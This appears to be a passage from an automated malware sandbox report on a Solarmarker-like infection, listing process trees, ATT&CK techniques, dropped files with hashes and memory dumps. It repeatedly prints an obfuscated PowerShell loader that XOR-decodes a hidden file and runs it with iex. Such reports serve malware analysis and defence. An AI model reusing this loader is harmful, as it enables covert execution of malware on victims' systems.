    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3480
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
94c857fcf0b3b1537854e269e06c5fcc

SHA1
a1cd11810de5bc798daaabcb0b54f64b7a965614

SHA256
5d0825096b71c02721243ef8788b2e8db107832ccccc67aa850a6ba940eb1a9a

SHA512
3bc68aaba79582ccfff63ed45f9ad6603f7a85a475f4dc8c8e49319347de977d7200b221e6189f3d8241080030751abec48ee469c90e79c34ca142dc13a32724

Download Submit
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Filesize
12KB

MD5
fb60f9040b4eab81ff0ad048cd2e7f89

SHA1
a7208b5e4ae0a8eb146e7dc7ec8c9b5ab8b284fd

SHA256
f5e5e1be06c2112479f754ef9ec4d9e2adbfe3117c285647727354f0c2049e06

SHA512
c028e8fb1511eae939cbffbe1130361f92926fe4c57e3d8100cac3bb5ee20445a1eb72f2584055b6e7a49ecd5d82c11ca68c9565031d584e86673012a06bf2f0

Download Submit
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Filesize
12KB

MD5
395fc8886171c708c69f9b64e6b8750c

SHA1
7600edc1c183ebd789ab491daaa106e7334dbc2a

SHA256
07cc866a4ffb1b1e10499751d52822fb1886dce91d52fdb20e7a2fafdebed50e

SHA512
263fb820bde25556eadf2d07b21f94f5539fdb9b0f2b4319c8044069952533349da341ce220c8929b656069e77fd7f440c0ba749030376f3fb46f7d93fcd92a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
0774a05ce5ee4c1af7097353c9296c62

SHA1
658ff96b111c21c39d7ad5f510fb72f9762114bb

SHA256
d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

SHA512
104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a2f0c6b6308dce0aa9f4df1249c1c9b5

SHA1
9d9a40f1b90cd904b468419d489dce389a851707

SHA256
d221f5ef9002d7688e463cddd60d1516a663f7f417890379ea84f6a06e66abbf

SHA512
b5aab5a56cdef8c01dc3e757b6bcfb4c11d141659db2e991b3fd7eec7ccbd7a3dd3e00f13825e1e959a57b742ea2c024d514a0fdf1f76d1ecafc60840f1c6717

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zoxiogqc.s5u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-IAAKF.tmp\9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp

Filesize
3.1MB

MD5
001e5b57bb938debf77b3c595b4f2bc1

SHA1
603f9082ddd9a7245b30be8cddc72b9d4c039f84

SHA256
99f38ab843f0fce1720a1149175940bb3e6d6a2901fe3c9b2d85a34bb8495184

SHA512
45626e7f03635cf80da893b3d650daf836d8e748854808e34abdc22b4fe718c21b0ebc008ad713099ae93e82afea84d4e77e6d5a88395d93f36099a5a5f517fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-KGASH.tmp\Promotions.pdf

Filesize
339KB

MD5
731aef021cc5c6372f0a9fd10ea66188

SHA1
c4da99c489b6ff18abf6f4355fba4620d50fbd4a

SHA256
6338b77622b885357e3b9aff1637606938c143bae1fd44d895cd16df0fdcdd3a

SHA512
985927e3cad08a25c736b2c6a78ecc3af862083cc778627f78c7aadbf51b309f82f8a71e53249a900a4c7e843ac75dc26befb669755725d164825098060854c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-KGASH.tmp\_isetup\_isdecmp.dll

Filesize
34KB

MD5
c6ae924ad02500284f7e4efa11fa7cfc

SHA1
2a7770b473b0a7dc9a331d017297ff5af400fed8

SHA256
31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

SHA512
f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

Download Submit
C:\Users\Admin\AppData\Roaming\solarmarker.dat

Filesize
32B

MD5
d257aac4cc53c8c55ad1f5fb96474194

SHA1
150120d54b054223d71f1c4e221ea1b5d2af6c68

SHA256
ce4f380513c32865fe01e37bd3ea9cfaeb54a031e6deb5d25c3e6bd64e868073

SHA512
c5465730608f1718f2d84744256a861efe99ed1abd8b789a52354d9e737c13a5d3ee95bbb16fae749ea48d49ffbf57e3c220917c409811c01fbf304b5a4d8ce7

Download Submit
C:\Users\Admin\AppData\Roaming\yrYcwxLgMipVGdZW\PQvdsAZyNjDHBcrVUulYeTpFKaEmkCLOXzMiqhSGbWoJfgxtwnIR

Filesize
29KB

MD5
02d344c43dfc76a1d0577de9ff4ecdfa

SHA1
3a6d90eae24ea4d9f6998ba21f1cb805efa06690

SHA256
0b1ba7deb76d6688dd71d4b3c2206aef9757877154c2a39cc2304035a144d83f

SHA512
a6606262570f295a90b0b228ee69506ac8b2595189837374e3f9ff7fdc6269c973d788480d24077ed77b6bb0e72dfe08dfd88dc940b5f7572d84c8c1b47d1b92

Download Submit
C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70

Filesize
58KB

MD5
3d603f9b132234691579e3fae5dd5e76

SHA1
29b71c854575b32de41e82ad760ef78e16cabfd1

SHA256
cbdd86547d177ba78229a648f612a1c6b581d50ed55b3f47ea7bcbccc7c20c47

SHA512
cd7c3c7866d3dda0dc0a8c6950dbeba0b5cd26ef443760e054493ecdce2a8dddc1d7791706a3e01b11fa9d25fbfb88e23f1629ede184e9f19cdc54aabafa7385

Download Submit
memory/1044-52-0x0000000006140000-0x0000000006494000-memory.dmp

Filesize
3.3MB

Download
memory/1044-140-0x0000000006740000-0x000000000675E000-memory.dmp

Filesize
120KB

Download
memory/1044-41-0x0000000005180000-0x00000000051B6000-memory.dmp

Filesize
216KB

Download
memory/1488-145-0x0000000000400000-0x0000000000723000-memory.dmp

Filesize
3.1MB

Download
memory/1488-6-0x0000000000400000-0x0000000000723000-memory.dmp

Filesize
3.1MB

Download
memory/2392-44-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/2392-221-0x0000000006850000-0x000000000685E000-memory.dmp

Filesize
56KB

Download
memory/2392-153-0x0000000008800000-0x0000000008E7A000-memory.dmp

Filesize
6.5MB

Download
memory/2392-150-0x0000000006A50000-0x0000000006A6A000-memory.dmp

Filesize
104KB

Download
memory/2392-151-0x0000000006AB0000-0x0000000006AD2000-memory.dmp

Filesize
136KB

Download
memory/2392-152-0x0000000007BD0000-0x0000000008174000-memory.dmp

Filesize
5.6MB

Download
memory/2392-42-0x0000000005750000-0x0000000005D78000-memory.dmp

Filesize
6.2MB

Download
memory/2392-149-0x0000000007580000-0x0000000007616000-memory.dmp

Filesize
600KB

Download
memory/2392-141-0x0000000006B70000-0x0000000006BBC000-memory.dmp

Filesize
304KB

Download
memory/2392-43-0x0000000005500000-0x0000000005522000-memory.dmp

Filesize
136KB

Download
memory/2392-45-0x0000000005F60000-0x0000000005FC6000-memory.dmp

Filesize
408KB

Download
memory/3148-0-0x0000000000400000-0x0000000000501000-memory.dmp

Filesize
1.0MB

Download
memory/3148-148-0x0000000000400000-0x0000000000501000-memory.dmp

Filesize
1.0MB

Download
memory/3148-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download